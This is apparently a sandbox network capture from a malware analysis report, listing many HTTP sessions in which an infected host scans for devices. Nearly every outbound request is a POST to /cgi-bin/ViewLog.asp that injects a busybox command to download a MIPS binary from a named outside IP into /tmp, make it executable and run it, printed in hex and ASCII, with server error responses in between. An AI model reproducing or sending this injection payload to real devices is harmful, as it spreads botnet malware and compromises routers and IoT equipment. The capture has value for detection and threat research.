                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              745192.168.2.135621895.210.96.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.696844101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              746192.168.2.135423062.202.153.228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.706203938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              747192.168.2.134252495.143.177.668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.709144115 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              748192.168.2.136020295.216.170.1998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.713593960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.912447929 CET1340INHTTP/1.1 500 Server Error
                                              Date: Thu, 23 Nov 2023 04:18:12 GMT
                                              X-Content-Type-Options: nosniff
                                              Content-Type: text/html;charset=utf-8
                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                              Cache-Control: no-cache,no-store,must-revalidate
                                              X-Hudson-Theme: default
                                              Referrer-Policy: same-origin
                                              Cross-Origin-Opener-Policy: same-origin
                                              Set-Cookie: JSESSIONID.2c4544f9=node0191a36t7nyaac1uhoaws10rsb180907.node0; Path=/; HttpOnly
                                              X-Hudson: 1.395
                                              X-Jenkins: 2.342
                                              X-Jenkins-Session: 7bfa6bdd
                                              X-Frame-Options: sameorigin
                                              Content-Encoding: gzip
                                              X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAgJJ5uycmyD26idCnS6EcdBeUbD5NqIM1zKgCCaBmbDUp2KocYsN/vVKN7vc/Xbq6DvzW2LcMVeq6i4ljPnHAx9zc0g7J4em3QJiOF7N5Dsn6qaNUV5leQypDTamedVD+szQOjmJw1d+K+bMzo9gGu9RClnr3dRz1NaDIRpy0fwrzB/VLDi+VxjthLAOIkmwpBxifWYHckqj7GP9pR5oLN3EQIQpcrLWqPpvE4ybU4OaP9wG+tVaCtmYPSvSkgFZ7Qo0pgdpX9vhVLCiYBdoj4/lsRnf4Pqv+tBsNVfDCVPuigZGgUA5QM4JV0YsSoje6e9sJfGEZAPx2dgOSrSGWRwIDAQAB
                                              Content-Length: 2178
                                              Connection: close
                                              Server: Jetty(9.4.45.v20220203)
                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 ff b5 59 5b 8f e3 b6 15 7e cf af 60 54 14 db 00 a1 ee 96 e5 8d ed 62 6f 41 37 98 66 82 9d ed 0d 45 31 a0 24 da e2 8c 24 2a 24 e5 99 c9 53 d2 a7 fe 8a a2 40 ff c0 a6 2f dd ee c3 2e d0 5f e0 f9 47 3d a4 24 5f 66 3d b7 f5 f4 c1 14 45 1e 1e 1e 9e 1b bf 23 7f 86 d0 67 08 8d 3f 7f 7e f8 ec f5 9f be 7b 81 72 55 16 d3 b1 6e 51 5a 10 29 27 96 05 af 94 64 48 50 f9 bb 57 07 13 cb 91 8a 28 96 3a c3 64 46 a2 24 cb 2c 94 11 45 b0 e0 5c 35 a2 00 fa ee 9d 4a f3 7a 0d 39 3d 57 b4 92 8c 57 12 93 05 61 05 49 0a 3a b1 94 68 68 47 d0 54 4c 61 45 a5 9a 58 33 52 c8 7e 98 95 64 7e 0d 67 a7 9d eb 08 53 d1 94 09 d6 92 53 31 b1 be a1 d5 29 83 bd 9e e9 d1 2d 8a 05 29 1a d8 39 1b c4 61 90 06 5e 10 47 23 9f 50 3a 8a a2 78 e8 ba 2e 8d a2 d9 c8 4f 3d e8 25 b3 34 a6 71 94 84 33 77
                                              Data Ascii: Y[~`TboA7fE1$$*$S@/._G=$_f=E#g?~{rUnQZ)'dHPW(:dF$,E\5Jz9=WWaI:hhGTLaEX3R~d~gSS1)-)9a^G#P:x.O=%4q3w


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              749192.168.2.135087485.122.216.648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.729274035 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              750192.168.2.134222495.87.82.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.791899920 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.067183018 CET417INHTTP/1.1 400 Bad Request
                                              Date: Fri, 21 Nov 2014 00:34:43 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Content-encoding: gzip
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              751192.168.2.135720494.44.155.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.943633080 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.169836998 CET396INHTTP/1.1 501 Not Implemented
                                              Cache-Control: no-store
                                              Connection: close
                                              Content-Length: 137
                                              Date: Thu, 23 Nov 2023 04:18:12 GMT
                                              Expires: 0
                                              Pragma: no-cache
                                              X-Frame-Options: sameorigin
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!doctype html><html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              752192.168.2.134290462.210.102.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.971728086 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.147351980 CET261INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:18:13 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              753192.168.2.134778694.25.216.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.236562967 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              754192.168.2.136074095.183.64.1448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.283616066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              755192.168.2.133314694.20.234.1468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.357127905 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.854161978 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              756192.168.2.134861694.16.15.1188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.483362913 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              757192.168.2.133321294.20.234.1468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.643460035 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              758192.168.2.134661231.136.172.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.563683987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.766189098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              759192.168.2.1352302106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.809125900 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 32 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:23Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              760192.168.2.133337431.169.113.1568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.934207916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.119771957 CET755INHTTP/1.0 404 Not Found !!!
                                              Pragma: no-cache
                                              Content-type: text/html
                                              WWW-Authenticate: /cgi-bin/ViewLog.asp
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 